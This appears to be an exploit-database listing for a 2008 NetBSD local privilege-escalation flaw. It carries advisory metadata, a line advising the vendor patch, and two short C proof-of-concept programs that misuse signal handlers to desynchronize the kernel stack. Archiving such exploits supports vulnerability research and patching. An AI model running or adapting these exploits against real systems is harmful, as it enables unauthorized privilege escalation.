header-logo
Suggest Exploit
vendor:
NetBSD
by:
SecurityFocus
7.2
CVSS
HIGH
Privilege Escalation
264
CWE
Product Name: NetBSD
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

NetBSD Local Privilege Escalation Vulnerability

NetBSD is prone to a local privilege-escalation vulnerability. A local attacker may exploit this issue to cause the kernel stack to become desynchronized. This may allow the attacker to gain elevated privileges or may aid in further attacks.

Mitigation:

Apply the latest security patches from the vendor.
Source

Exploit-DB raw data:

/*
source: https://www.securityfocus.com/bid/36430/info

NetBSD is prone to a local privilege-escalation vulnerability.

A local attacker may exploit this issue to cause the kernel stack to become desynchronized. This may allow the attacker to gain elevated privileges or may aid in further attacks. 
*/

/* ... */
int main(int argc, char **argv)
{
  jmp_buf env;

  void handlesig(int n) {
        longjmp(env, 1);

  }
  signal(SIGSEGV, handlesig);

  if (setjmp(env) == 0) {
        ( (void(*)(void)) NULL) ();
  }

  return 0;
}

/* ... */
int main(int argc, char **argv)
{
       char baguette;
       signal(SIGABRT, (void (*)(int))&baguette);
       abort();
}

Navigation

Suggest Exploit

Services By CQR